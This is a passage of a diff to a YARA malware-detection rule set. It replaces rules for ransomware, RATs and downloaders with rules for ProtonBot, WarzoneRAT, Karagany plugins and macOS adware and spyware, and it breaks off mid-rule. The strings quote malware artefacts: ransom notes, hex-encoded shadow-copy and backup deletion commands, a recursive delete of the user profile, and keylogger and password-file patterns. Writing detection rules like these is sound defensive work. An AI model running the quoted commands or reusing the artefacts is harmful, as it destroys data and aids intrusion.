loader" author = "ditekSHen" - id = "2c90f8e7-ced4-56da-ab8d-61b5ba63dacd" - date = "2024-09-06" - modified = "2024-09-06" + id = "b0d08378-0297-5e70-99f1-1dc0fec6fa01" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4977-L4993" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f8a3897de9522340799a59e3e755c323b0defaab73a9030b6b69a1a82c05dcd0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2952-L2969" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b511dfd47109d36ffc7fcb23b49779e1164d50a28061ab724d7a2c744ac23ac8" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.ProtonBot" strings: - $s1 = "DEARCRY!" fullword ascii - $s2 = ".CRYPT" fullword ascii - $s3 = "\\EncryptFile -svcV2\\" ascii - $s4 = "please send me the following hash!" ascii - $s5 = "dear!!!" fullword ascii - $s6 = "/readme.txt" fullword ascii - $o1 = { c3 8b 65 e8 c7 45 fc fe ff ff ff 8b b5 f4 e9 ff } - $o2 = { 0f 8c 27 ff ff ff 33 db 57 e8 7b 36 00 00 eb 0a } - $o3 = { 0f 8c 2a ff ff ff 53 57 e8 b7 42 00 00 8b 4c 24 } + $x1 = "\\PROTON\\Release\\build.pdb" ascii + $x2 = "\\proton\\proton bot\\json.hpp" wide + $x3 = "proton bot" ascii wide + $s1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide + $s2 = "ranges.size() == 2 or ranges.size() == 4 or ranges.size() == 6" fullword wide + $s3 = "ref_stack.back()->is_array() or ref_stack.back()->is_object()" fullword wide + $s4 = "ktmw32.dll" fullword ascii + $s5 = "@detail@nlohmann@@" ascii + $s6 = "urlmon.dll" fullword ascii condition: - uint16(0)==0x5a4d and 4 of ($s*) or ( all of ($o*) and (2 of ($s*))) + uint16(0)==0x5a4d and (2 of ($x*) or ( all of ($s*) and 1 of ($x*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Sunshuttle : FILE +rule DITEKSHEN_MALWARE_Win_Imminentrat : FILE { meta: - description = "Detects SunShuttle / GoldMax" + description = "Detects ImminentRAT" author = "ditekSHen" - id = "1618d0bc-6e72-5f1e-81e7-56611bfd7f8b" - date = "2024-09-06" - modified = "2024-09-06" + id = "99831b32-d8a0-5814-bf41-491f607ee825" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L4995-L5017" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fa8feb069e73aa0a7fcb4daecc1fdf8edeff65e5aeefef161626647fe989e5c0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2971-L2994" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f959fd28e818b17c962fcd5bb99fa5ac0058f22494950e0200f139703f3e756a" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "main.beaconing" fullword ascii - $s2 = "main.clean_file" fullword ascii - $s3 = "main.decrypt" fullword ascii - $s4 = "main.define_internal_settings" fullword ascii - $s5 = "main.delete_empty" fullword ascii - $s6 = "main.encrypt" fullword ascii - $s7 = "main.false_requesting" fullword ascii - $s8 = "main.removeBase64Padding" fullword ascii - $s9 = "main.resolve_command" fullword ascii - $s10 = "main.retrieve_session_key" fullword ascii - $s11 = "main.save_internal_settings" fullword ascii - $s12 = "main.send_command_result" fullword ascii - $s13 = "main.send_file_part" fullword ascii - $s14 = "main.wget_file" fullword ascii - $s15 = "main.write_file" fullword ascii + $x1 = "abuse@imminentmethods.net" ascii + $x2 = "Imminent-Monitor-" ascii + $x3 = "AddressChangeListener" fullword ascii + $x4 = "SevenZipHelper" fullword ascii + $x5 = "WrapNonExceptionThrows" fullword ascii + $s1 = "_ENABLE_PROFILING" wide + $s2 = "Anti-Virus: {0}" wide + $s3 = "File downloaded & executed" wide + $s4 = "Chat - You are speaking with" wide + $s5 = "\\Imminent\\Plugins" wide + $s6 = "\\Imminent\\Path.dat" wide + $s7 = "\\Imminent\\Geo.dat" wide + $s8 = "DisableTaskManager = {0}" wide + $s9 = "This client is already mining" wide + $s10 = "Couldn't get AV!" wide + $s11 = "Couldn't get FW!" wide condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (4 of ($x*) or 5 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ranzylocker : FILE +rule DITEKSHEN_MALWARE_Win_Warzonerat : FILE { meta: - description = "Detects RanzyLocker / REntS ransomware" + description = "Detects AveMaria/WarzoneRAT" author = "ditekSHen" - id = "0d74f6fd-e1d2-5939-991e-7fdd2ca3310b" - date = "2024-09-06" - modified = "2024-09-06" + id = "4f3df696-280c-5f2b-9511-8cc7c9dff1d6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5019-L5042" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "15897144843acf49b81c5428fd1bb56d7a2acf16047a6e5d3ca4f2aaa8891577" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L2996-L3011" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1af8b0f90b0de3287499082a6d6d9da6ed62a3110018e0c0f7149353693060b2" score = 75 quality = 75 tags = "FILE" strings: - $hr1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii - $hr2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii - $hr3 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii - $hr4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii - $hr5 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" ascii - $hr6 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii - $hx1 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii - $hx2 = "534F4654574152455C4D6963726F736F66745C45524944" ascii - $hx3 = "227375626964223A22" ascii - $hx4 = "226E6574776F726B223A22" ascii - $hx5 = "726561646D652E747874" ascii - $hx6 = "-nolan" fullword wide - $o1 = { 8d 45 e9 89 9d 54 ff ff ff 88 9d 44 ff ff ff 3b } - $o2 = { 8b 44 24 2? 8b ?c 24 34 40 8b 54 24 38 89 44 24 } - $o3 = { 8b 44 24 2? 8b ?c 24 1c 89 44 24 34 8b 44 24 28 } - $o4 = { 8b 44 24 2? 8b ?c 24 34 05 00 00 a0 00 89 44 24 } + $s1 = "RDPClip" fullword wide + $s2 = "Grabber" fullword wide + $s3 = "Ave_Maria Stealer OpenSource" wide + $s4 = "\\MidgetPorn\\workspace\\MsgBox.exe" wide + $s5 = "@\\cmd.exe" wide + $s6 = "/n:%temp%\\ellocnak.xml" wide + $s7 = "Hey I'm Admin" wide + $s8 = "warzone160" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($hx*) or (2 of ($hr*) and 2 of ($hx*)) or ( all of ($o*) and 2 of ($h*))) + uint16(0)==0x5a4d and 5 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Wobbychipmbr : FILE +rule DITEKSHEN_MALWARE_Win_Karaganycore : FILE { meta: - description = "Detects WobbyChipMBR / Covid-21 ransomware" + description = "Detects Karagany/xFrost core plugin" author = "ditekSHen" - id = "581fbce1-128d-5323-a259-14d9bfdf09b1" - date = "2024-09-06" - modified = "2024-09-06" + id = "c066805b-9373-5524-aff9-d16cd59f5a24" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5044-L5060" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "168c7f610625131c9552252d2b824a90918d2961996ee0f783497dff5cf17351" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3013-L3027" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cde96ac6477fda1312ce4f7532018c9f11df7d39c40155d10bdde0e3d84c6d57" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "You became a Victim of the Covid-21 Ransomware" ascii wide - $x2 = "Reinstalling Windows has been blocked" ascii wide - $x3 = "Enter Decryption Key:" ascii wide - $x4 = "encrypted with military grade encryption" ascii wide - $s1 = "schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR" ascii - $s2 = "\\EFI\\Boot\\bootx64.efi" ascii wide - $s3 = "DumpHex" fullword ascii - $s4 = "TFTP Error" fullword wide - $s5 = "HD(Part%d,MBRType=%02x,SigType=%02x)" fullword wide + $s1 = "127.0.0.1" fullword ascii + $s2 = "port" fullword ascii + $s3 = "C:\\Windows\\System32\\Kernel32.dll" fullword ascii + $s4 = "kernel32.dll" fullword ascii + $s5 = "http" ascii + $s6 = "Move" fullword ascii + $s7 = "<supportedOS Id=\"{" ascii condition: - uint16(0)==0x5a4d and (3 of ($x*) or all of ($s*) or (1 of ($x*) and 2 of ($s*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Snatch : FILE +rule DITEKSHEN_MALWARE_Win_Karaganykeylogger : FILE { meta: - description = "Detects Snatch / GoRansome / MauriGo ransomware" + description = "Detects Karagany/xFrost keylogger plugin" author = "ditekSHen" - id = "00dce673-b909-571f-8117-c5d4ce73fb31" - date = "2024-09-06" - modified = "2024-09-06" + id = "dd14ede0-7132-5b7f-872a-d96d5275a8e4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5062-L5091" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bf8c33a7203458c80a43944c3117bb897b1702f0024271904d9be682cbd695fc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3029-L3041" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7f1f5b2ca67e62380c8a8095fed4a4fd76d7bc15c9fe2d76e780ad85f886ef7b" score = 75 - quality = 73 + quality = 23 tags = "FILE" strings: - $s1 = "main.encryptFile" ascii - $s2 = "main.encryptFileExt" ascii - $s3 = "main.deleteShadowCopy" ascii - $s4 = "main.Shadow" fullword ascii - $s5 = "main.RecoverMe" fullword ascii - $s6 = "main.EncryptWithPublicKey" ascii - $s7 = "main.EncoderLookupDir" fullword ascii - $s8 = "main.ALIGNUP" fullword ascii - $s9 = "main.encrypt" fullword ascii - $s10 = "github.com/mauri870/ransomware" ascii - $m1 = "Dear You, ALl Your files On YOUR network computers are encrypted" ascii - $m2 = "You have to pay the ransom of %s USD in bitcoins to the address" ascii - $m3 = "REMEMBER YOU FILES ARE IN SAVE HANDS AND WILL BE RESTORED OR RECOVERED ONCE PAYMENT IS DONE" ascii - $m4 = ":HELP FEEED A CHILD:" ascii - $m5 = ">SYSTEM NETWORK ENCRYPTED<" ascii - $m6 = "YOUR IDENTIFICATION : %s" ascii - $m7 = "convince you of our honesty" ascii - $m8 = "use TOR browser to talk with support" ascii - $m9 = "encrypted and attackers are taking" ascii - $p1 = "/Go/src/kitty/kidrives/" ascii - $p2 = "/LGoGo/encoder.go" ascii nocase - $p3 = "/Go/src/kitty/kidata/" ascii + $s1 = "__klg__" fullword wide + $s2 = "__klgkillsoft__" fullword wide + $s3 = "CLIPBOARD_PASTE" wide + $s4 = "%s\\k%d.txt" wide + $s5 = "\\Update\\Tmp" wide condition: - uint16(0)==0x5a4d and (3 of ($s*) or 2 of ($m*) or (1 of ($m*) and 1 of ($s*)) or ( all of ($p*) and (1 of ($s*) or 1 of ($m*)))) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Meteorite : FILE +rule DITEKSHEN_MALWARE_Win_Karaganyscreenutil : FILE { meta: - description = "Detects Meteorite downloader" + description = "Detects Karagany/xFrost ScreenUtil module" author = "ditekSHen" - id = "ce7a72ce-56a8-5def-a952-f0b08efe8a4a" - date = "2024-09-06" - modified = "2024-09-06" + id = "5eab1bb9-a433-54e6-963b-4aca863dc73f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5093-L5109" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0ae8183d949046be4257b48571a266f2501d60dd302f511ca1a2d518884e6a7f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3043-L3055" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d10230d94adfdddd604e2569ae3323efa1d5722647b9c704fceefe9446ccebd1" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "MeteoriteDownloader" fullword ascii wide - $x2 = "Meteorite Downloader" fullword ascii wide - $x3 = "Meteorite Downloader v" wide - $s1 = "regwrite" fullword wide - $s2 = "urlmon" fullword ascii - $s3 = "wscript.shell" fullword wide - $s4 = "modMain" fullword ascii - $s5 = "VBA6.DLL" fullword ascii - $s6 = "^_http" ascii + $s1 = "__pic__" ascii wide + $s2 = "__pickill__" ascii wide + $s3 = "\\picture.png" fullword wide + $s4 = "%d.jpg" wide + $s5 = "\\Update\\Tmp" wide condition: - uint16(0)==0x5a4d and (1 of ($x*) or (5 of ($s*))) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Legionlocker : FILE +rule DITEKSHEN_MALWARE_Win_Karaganylistrix : FILE { meta: - description = "Detects LegionLocker ransomware" + description = "Detects Karagany/xFrost Listrix module" author = "ditekSHen" - id = "4e5c50d0-808e-5adb-bce9-804ddf66ca61" - date = "2024-09-06" - modified = "2024-09-06" + id = "837cc9e7-eefb-530c-854b-51bb4444ae78" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5111-L5129" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2da897b5603415f14fff134b3a94d77e6963da79e117d26ba16e6b04e45f4045" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3057-L3069" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "02216061dbe93b7bea108f4b27c052d87c14cfe9395c6c5d4eed46ed7819e7ae" score = 75 quality = 75 tags = "FILE" strings: - $m1 = "+Do not run task manager, powershell, cmd etc." ascii wide - $m2 = "3 hours your files will be deleted." ascii wide - $m3 = "files have been encrypted by Legion Locker" ascii wide - $s1 = "passwordBytes" fullword ascii - $s2 = "_start_enc_" ascii - $s3 = "_del_desktop_" ascii - $s4 = "Processhacker" wide - $s5 = "/k color 47 && del /f /s /q %userprofile%\\" wide - $s6 = "Submit code" fullword wide - $pdb1 = "\\obj\\Debug\\LegionLocker.pdb" ascii - $pdb2 = "\\obj\\Release\\LegionLocker.pdb" ascii + $s1 = "\\Update\\Tmp\\" wide + $s2 = "*pass*.*" fullword wide + $s3 = ">> NUL" wide + $s4 = "%02d.%02d.%04d %02d:%02d" wide + $s5 = "/c del" wide condition: - uint16(0)==0x5a4d and (1 of ($m*) or 1 of ($pdb*) or 4 of ($s*)) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagentgo : FILE +rule DITEKSHEN_MALWARE_Osx_Macsearch : FILE { meta: - description = "Detects Go-based downloader" + description = "Detects MacSearch adware" author = "ditekSHen" - id = "e16ccb89-2eb6-5457-a88e-f802f3c35764" - date = "2024-09-06" - modified = "2024-09-06" + id = "facdf05c-5ee4-54c6-9ca3-01978af2b6e6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5131-L5144" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b9dd2446eddff18be00feb34d8911600feb395a9ce2566786d42b48b444230d0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3071-L3092" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "973b7215fc8d04685a46d05b53b4092e7b81ed0d64d6982b534f2b89d0a59443" score = 75 - quality = 75 + quality = 71 tags = "FILE" strings: - $s1 = "main.downloadFile" fullword ascii - $s2 = "main.fetchFiles" fullword ascii - $s3 = "main.createDefenderAllowanceException" fullword ascii - $s4 = "main.unzip" fullword ascii - $s5 = "HideWindow" fullword ascii - $s6 = "/go/src/installwrap/main.go" ascii + $s1 = "open -a safari" ascii + $s2 = "/INDownloader" ascii + $s3 = "/safefinder" ascii + $s4 = "/INEncryptor" ascii + $s5 = "/INInstallerFlow" ascii + $s6 = "/INConfiguration" ascii + $s7 = "/INChromeAndFFSetter" ascii + $s8 = "/INSafariSetter" ascii + $s9 = "/bin/launchctl" fullword ascii + $s10 = "/usr/bin/csrutil" fullword ascii + $s11 = "_Tt%cSs%zu%.*s%s" fullword ascii + $s12 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii + $s13 = "/macap/safefinder_Obf/safefinder/" ascii + $s14 = "/safefinder.build/Release/macsearch.build/" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0xfacf and 10 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Blackmoon : FILE +rule DITEKSHEN_MALWARE_Osx_Genieo : FILE { meta: - description = "Detects executables using BlackMoon RunTime" + description = "Detects LinqurySearch/Genieo adware" author = "ditekSHen" - id = "76071d36-3d2d-589c-8c3f-0ae60e69996e" - date = "2024-09-06" - modified = "2024-09-06" + id = "ac44eefd-bf1c-5d4b-bcd4-9a5d394ac1d3" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5146-L5155" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "05bfde8ec3a469df5707c195e25995ac6af730e8a1595b1a598276c024420be2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3094-L3112" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "951dc8539435a52d9eea00b3fdaf98cf618c03867066819f2f9244165e57c675" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Osx.Trojan.Genieo" strings: - $s1 = "blackmoon" fullword ascii - $s2 = "BlackMoon RunTime Error:" fullword ascii + $s1 = "<key>com.apple.security.get-task-allow</key>" fullword ascii + $s2 = "U1QQFXAfCxAfRUNCH1JZXh9" ascii + $s3 = "XVFTQ1VRQlNYH" ascii + $s4 = "dF9HXlxfUVQQVUJCX0IQHRB" ascii + $s5 = "Value:forHTTPHeaderField:" ascii + $s6 = "postContent:::" fullword ascii + $s7 = "postLog:" fullword ascii + $s8 = "initWithBase64EncodedString:options:" fullword ascii + $s9 = "do shell script \"%@\" with administrator privileges" fullword ascii + $s10 = /LinqurySearch-[a-f0-9]{40,}/ condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0xfacf and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Iceid : FILE +rule DITEKSHEN_MALWARE_Osx_AMCPCVARK : FILE { meta: - description = "Detects IceID / Bokbot variants" + description = "Detects OSX TechyUtils/PCVARK adware" author = "ditekSHen" - id = "0da94737-0f82-5892-a0eb-f9f3c0a114cc" - date = "2024-09-06" - modified = "2024-09-06" + id = "1378364b-db10-5194-98f8-5347504a92e6" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5157-L5176" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "204b4c297806a36ca14bb3e659824f4eb49b18308af7090f0db1194705f1e2c9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3114-L3139" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b18a9f578af98feb5107d9ef85850457ba5921ab58af7b097a815e3af74f05f7" score = 75 quality = 75 tags = "FILE" + clamav_sig = "MALWARE.Osx.Adware.AMC-PCVARK-TechyUtils" strings: - $n1 = "POST" fullword wide - $n2 = "; _gat=" fullword wide - $n3 = "; _ga=" fullword wide - $n4 = "; _u=" fullword wide - $n5 = "; __io=" fullword wide - $n6 = "; _gid=" fullword wide - $n7 = "Cookie: __gads=" fullword wide - $s1 = "c:\\ProgramData" ascii - $s2 = "loader_dll_64.dll" fullword ascii - $s3 = "loader_dll_32.dll" fullword ascii - $s4 = "/?id=%0.2X%0.8X%0.8X%s" ascii - $s5 = "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X" ascii + $s1 = "Mac Auto Fixer.app" fullword ascii + $s2 = "com.techyutil.macautofixer" fullword ascii + $s3 = "com.findApp.findApp" ascii + $s4 = "Library/Preferences/%@.plist" fullword ascii + $s5 = "Library/%@/%@" fullword ascii + $s6 = "Library/Application Support/%@/%@" fullword ascii + $s7 = "sleep 3; rm -rf \"%@\"" fullword ascii + $s8 = "Silently calling url: %@" ascii + $cnc1 = "cloudfront.net/getdetails" ascii + $cnc2 = "trk.entiretrack.com/trackerwcfsrv/tracker.svc/trackOffersAccepted/?" ascii + $cnc3 = "pxl=%@&x-count=1&utm_source=%@&lpid=0&utm_content=&utm_term=&x-base=&utm_medium=%@&utm_publisher=%@&offerpxl=&x-fetch=1&utm_campaign=@&affiliateid=&x-at=&btnid=" ascii + $x1 = "mafsysinfo" fullword ascii + $x2 = "MAF4497_MAF4399_MAF2204" ascii + $developerid = "Developer ID Application: Rahul Gahlot (RZ74UYT742)" ascii condition: - uint16(0)==0x5a4d and (( all of ($n*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($n*))) + uint16(0)==0xfacf and (6 of ($s*) or 2 of ($cnc*) or all of ($x*) or $developerid) } import "pe" -rule DITEKSHEN_MALWARE_Win_Purge : FILE +rule DITEKSHEN_MALWARE_Osx_Realtimespy : FILE { meta: - description = "Detects Purge ransomware" + description = "Detects macOS RealtimeSpy monitoring app" author = "ditekSHen" - id = "b3fb9f38-ce12-5e0e-8908-3379b5da3497" - date = "2024-09-06" - modified = "2024-09-06" + id = "6485abf3-896c-54cd-ad84-7bd86456e47b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5178-L5201" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "83d13eca69bc99539e47d6d29689edf2a4fcd2260c6e909582126a490eef8115" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3141-L3166" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4ef2e1b8d34962cd3eab23f401b764b38b8332233aa2ae91b218af499d8ab8ff" score = 75 - quality = 75 + quality = 57 tags = "FILE" + clamav_sig = "MALWARE.Osx.Trojan.RealtimeSpy" strings: - $n1 = "imagesave/imagesize.php" ascii - $n2 = "imageinfo.html" ascii - $n3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" ascii - $n4 = "Content-Type: application/x-www-form-urlencoded" ascii - $m1 = "YOUR_ID: %x%x" wide - $m2 = "Specially for your PC was generated personal" wide - $m3 = "which is on our Secret Server" wide - $m4 = "wait for a miracle and get your price" wide - $s1 = "%s\\SpyHunter Remove Ransomware" wide - $s2 = "$recycle.bin" fullword wide - $s3 = "TheEnd" fullword wide - $s4 = "%s\\HELP_DECRYPT_YOUR_FILES.TXT" fullword wide - $s5 = "%s.id_%x%x_email_" wide - $s6 = "scmd" fullword wide - $s7 = "process call create \"%s\"" wide - $s8 = "FinishEnds" fullword ascii + $x1 = "SPYAGENT4HASHCIPHER" fullword ascii + $x2 = ":username:password:acctid:compUser:compName:" ascii + $x3 = ":username:password:acctid:compName:" ascii + $x4 = "://www.realtime-spy-mac.com/" ascii + $x5 = "/Users/spytech/" ascii + $x6 = "shell script \"touch /private/var/db/.AccessibilityAPIEnabled\" password \"pwd\" with administrator privileges" ascii + $x7 = "Content-Disposition: form-data; name=\"raptor_" ascii + $c1 = "_OBJC_CLASS_$_LocationLogger" fullword ascii + $c2 = "_OBJC_CLASS_$_MonitoringFunctions" fullword ascii + $c3 = "_OBJC_CLASS_$_ProcessLogger" fullword ascii + $c4 = "_OBJC_CLASS_$_RealtimeLoggingFunctions" fullword ascii + $c5 = "_OBJC_CLASS_$_Realtime_SpyAppDelegate" fullword ascii + $c6 = "_OBJC_CLASS_$_ScreenshotLogger" fullword ascii + $c7 = "_OBJC_CLASS_$_Uploader" fullword ascii + $c8 = "_OBJC_CLASS_$_UsageLogger" fullword ascii + $c9 = "_OBJC_CLASS_$_WebsiteLogger" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or all of ($n*) or 2 of ($m*) or (3 of ($s*) and (1 of ($n*) or 1 of ($m*)))) + uint16(0)==0xfacf and (2 of ($x*) or 2 of ($c*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Njrat : FILE +rule DITEKSHEN_MALWARE_Osx_Maxofferdeal : FILE { meta: - description = "Detects NjRAT / Bladabindi / NjRAT Golden" + description = "Detects macOS MaxOfferDeal adware" author = "ditekSHen" - id = "078dea64-8f95-5939-a1fb-c0a888adcf0d" - date = "2024-09-06" - modified = "2024-09-06" + id = "aec4ab77-7025-5856-99fb-aa7b86413c00" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5203-L5220" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "92d535a7c7f361b7a0901d0b99427ebc82a69577bfea73c04a7f9d51d2054b36" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3168-L3187" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a9788b2049ae7f345760a078b2932e79fe8fc0dd71e0446c213df64480c3e3d6" score = 75 - quality = 75 + quality = 46 tags = "FILE" + clamav_sig = "MALWARE.Osx.Adware.MaxOfferDeal" strings: - $x1 = /Njrat\s\d+\.\d+\sGolden\s/ wide - $s1 = /\sfirewall\s(add|delete)\sallowedprogram/ wide - $s2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 (63|6b) 00 20 00 70 00 69 00 6e 00 67 } - $s3 = "Execute ERROR" wide - $s4 = "Download ERROR" wide - $s5 = "[kl]" fullword wide - $s6 = "UploadValues" fullword wide - $s7 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide - $s8 = "HideM" fullword wide - $s9 = "No Antivirus" fullword wide + $s1 = "clEvE15obfuscated_data" 